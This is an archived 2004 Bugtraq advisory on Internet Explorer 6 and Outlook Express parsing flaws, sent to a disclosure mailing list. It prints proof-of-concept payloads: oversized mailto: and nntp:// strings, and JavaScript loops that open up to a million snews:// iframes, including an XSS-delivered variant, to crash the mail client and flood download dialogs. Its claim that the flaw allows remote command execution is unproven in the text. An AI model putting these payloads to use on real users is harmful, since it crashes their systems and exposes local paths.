Internet Explorer - Multiple Vulnerabilities

From: Rafel Ivgi, The-Insider (theinsider_at_012.net.il)
Date: 01/20/04

  • Next message: Donato Ferrante: "Mephistoles Httpd 0.6.0final XSS"
    To: <bugtraq@securityfocus.com>
    Date: Tue, 20 Jan 2004 23:08:19 +0200
    
    

    Internet Explorer - Multiple Vulnerabilities

    Discovered by Rafel Ivgi, The-Insider.
    http://theinsider.deep-ice.com

    Every time i Read about a Vulnerability concerning I.E i believe more
    and more and I.E is the biggest backdoor ever.
    After the CONTENT-TYPE: bug that allowed to download exe's as audio's
    and all the patches, I.E 6 still has parsing problems. I discovered
    that amazingly with another wonderful microsoft software, i can
    force downloads on users, fake downloaded file extentions and names,
    inject scripts to the "blank" file, run a lot of different applications,
    cause a lot of errors and see the content of binary files inside I.E,
    cause a buffer overflow in outlook and even D.O.S the system.
    Before you read the following text i believe the most dangerous bug in I.E
    is the possibility
    of actively creating <iframes> or poping up new windows *without a
    limit*(only memory limit). This makes it easy
    to create many errors, overflows , and to D.O.S internet users.

    ****************************************************************************
    *********************************
    Internet Explorer & Outlook Express (6.00.2600 - Fully Patched)

    Microsoft has inserted a filtering engine inside Internet Explorer. This
    engine verifies that
    only secure,valid and appropriate(in syntax) data will be passed on to
    external applications.
    **************************************************
    The filtering engine skips a few important checks such as the "MAILTO:"
    protocol. With no filtering
    it allows inappropriate data to be sent to the default mail client.

    Example:
    mailto:%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaa
    aa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%
    a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5
    %C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99
    %a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%9
    8aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%9
    9%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%
    98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00
    %00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaa
    aaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%0
    0%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%
    C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%
    99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01
    %98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2
    %99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e
    2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%
    00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98

    which pops up the following error message : "The default mail client is not
    properly installed".
    There should be filtering because there can't be such email address such as
    this:(which is accepted by the I.E plugins filter)

    mailto:%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%
    01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%
    98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5
    %e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaa
    aa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%
    e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C
    8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e
    2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%
    a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaa
    aaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a
    6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5
    %C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3
    %e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    a%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaa%
    a5%e2%99%a6%e2%99%a3aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaa
    **************************************************

    This filtering engine also filters outlook links such as the NNTP & SNTP
    protocols. However
    the security hole appears when an attacker uses the SNEWS protocol, which
    has no filterings.

    nntp://aaaaaa.com/aaaaa - filtering active! - results an error message.
    sntp://aaaaaaaaaaaaaaa - filtering active! - results an error message.
    snews://aaaaaaaaaaaaa - filtering *inactive!* - results activation of
    outlook and server injection into outlook.

    This secuirty hole allows any html page/website to open outlook express and
    inject anything
    as if it was a valid news server. This can be a troubling issue if someone
    will make a loop
    that will inject a huge amount of fake snews servers, this address will
    remain written in the outlook's
    news servers database and may cause crash or waste of system resources.
    The simplest way to exploit this vulnerability is by XSS(Cross Site
    Scripting)

    Local example - example.html :
    -------------- Cut Here --------------
    <script>
    var i
    for (i=1;i<1000000;i++) {
    document.write("\<iframe
    src=\"snews://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" + i +
    "\"\>\<\/iframe>");
    }
    document.refresh;
    </script>
    -------------- Cut Here --------------

    Or by XSS:

    http://>/<script>var i; for (i=1;i<1000000;i++) {
    document.write("\<iframe
    src=\"s
    news://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" + i +
    "\"\>\<\/iframe>"); } document.refresh; </script>

    This issue also creates a Buffer Overflow within Outlook Express at offset
    0x00dc735, which closes
    outlook express, slows down the system and may even halt low memory
    machines.
    This buffer overflow in outlook express is HIGHLY DANGEROUS , it can cause
    remote arbitary command executions on almost every XP machine on earth.

    Temporary Fix For This Problem: The first time outlook is ran by the url
    "snews://aaaaaaaaaaaa"
    it asks the user if he would like outlook to be the default "SNEWS" client,
    Choosing no will
    solve the problem for now.
    ****************************************************************************
    *********************************
    Disable Backspace In I.E

    *Manually Type* in I.E address bar "http://www.yourhost.com/#"
    CLICK ENTER..
    No backspace!

    No special danger except abusing simple people.
    ****************************************************************************
    *********************************

    I.E automatically starts download box a file when the same file with a
    ".css" extention exists in that folder.
    For example:
    http://>/styles

    This will cause an I.E download box that tries to download the file
    "styles".
    ***This happends only because a file named "styles.css" is located in that
    folder.***

    Exploit Example - example2.html :
    -------------- Cut Here --------------:
    <script>
    var i
    for (i=1;i<1000;i++) {
    document.write("\<iframe src=\"
    http://>/styles\"\>\<\/iframe>");
    }
    document.refresh;
    </script>
    -------------- Cut Here --------------:

    This will execute frontpage and will start reffering the ".css" to it. For
    each file download there
    will open 2 message boxes, 1 is the download windows and 2 is the error
    "cant find " message,
    which reveals/enumerates the path of all local Temporary Internet Files
    folders. This quick memory
    overload will fill-up frontpage memory and afterwards it will open the
    ".css" files in "notepad". And
    after its done with notepad memeory it will try opening files in "open
    with", which is done by "rundll32.exe".
    At this point "rundll32.exe" will reach a out of memory overflow and will
    raise a message box for each
    file download attempt.
    ****************************************************************************
    *********************************
    I.E Long Parameter Errors
    nntp:///62.219.131.195/a=?b=?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaafile://http://ftp://www.tripod.com
    can be tested with all protocols nntp://,sntp://,ldap://,ftp://
    ****************************************************************************
    *********************************

    "Things that are unlikeable, are NOT impossible."


  • Next message: Donato Ferrante: "Mephistoles Httpd 0.6.0final XSS"

    Relevant Pages

    • Re: How do I reinstall OE without a disk?
      ... > I'm running XP Pro - Internet Explorer and OE do not show up in the list once ... >> with Outlook and that's what is causing the problem. ... time I try to download SP2 it tells me that there are no new updates etc. ... Having set up e-mail forwarding to another account, ...
      (microsoft.public.windows.inetexplorer.ie6_outlookexpress)
    • IE/OE Script error will not print
      ... Cannot Print from Internet Explorer or Outlook Express ... Error Message When You Attempt to Print a Web Page: ... Does anyone know of a download or ...
      (microsoft.public.windows.inetexplorer.ie6.setup)
    • Re: Word document arrives corrupted after email transmission
      ... when I send them by any email (Hotmail, Outlook, etc) people just cant ... Internet explorer cannot download the specified file ... I tried sending a copy to myself and when I access to internet explorer ... I just want that people be able to open and read my word files without ...
      (microsoft.public.word.docmanagement)
    • Word document arrives corrupted after email transmission
      ... files that apparently look good in my local machine. ... when I send them by any email (Hotmail, Outlook, etc) people just cant ... Internet explorer cannot download the specified file ... I tried sending a copy to myself and when I access to internet explorer ...
      (microsoft.public.word.docmanagement)
    • >>>> EXPRESS DOWNLOAD <<<<
      ... music express downloads, 6 download express nero, 6.0 download express ... outlook, 60 download express free outlook, 60 download express ... outlook, 945gm gu express chipset driver download, a free download ... for microsoft outlook express, download for outlook express, download ...
      (sci.lang.translation.marketplace)